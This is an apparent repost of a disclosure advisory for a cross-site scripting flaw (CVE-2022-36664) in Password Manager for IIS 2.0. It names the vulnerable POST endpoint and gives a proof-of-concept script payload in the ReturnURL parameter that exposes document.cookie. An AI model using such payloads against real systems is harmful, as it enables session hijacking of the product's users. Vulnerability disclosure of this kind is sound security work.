Home Tools Exploits & CVE's Password Manager For IIS 2.0 Cross Site Scripting

Password Manager For IIS 2.0 Cross Site Scripting

October 4, 2022

522

Authored by VP4TR10T

Password Manager for IIS version 2.0 suffers from a cross site scripting vulnerability.

advisories | CVE-2022-36664

# Exploit Title: *XSS*
# Exploit Author: *VP4TR10T*
# Vendor Homepage:*http://passwordmanager.adiscon.com/en/manual/
<http://passwordmanager.adiscon.com/en/manual/>
*# Software Link:*http://passwordmanager.adiscon.com/
<http://passwordmanager.adiscon.com/>
*# Version: *Version 2.0
*# Tested on: *WINDOWS*# CVE : *CVE-2022-36664

*Affected URI (when trying to change user password):
POST /isapi/PasswordManager.dll HTTP/1.1

HTTP Payload (Affected Parameter ):
ReturnURL=<script>alert(document.cookie)</script>

*Cordially,*

Password Manager For IIS 2.0 Cross Site Scripting

Follow us on Instagram @thecyberpost

EDITOR PICKS

Chyrp 2.5.2 Cross Site Scripting

Apache mod_proxy_cluster Cross Site Scripting

Backdoor.Win32.AsyncRat MVID-2024-0683 Code Execution

POPULAR POSTS

ESET NOD32 Antivirus 17.1.11.0 Unquoted Service Path

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

POPULAR CATEGORY

Pyro CMS 3.9 Server-Side Template Injection

WordPress Contact Form 1.7.14 Cross Site Scripting

Employee Record System 1.0 Cross Site Scripting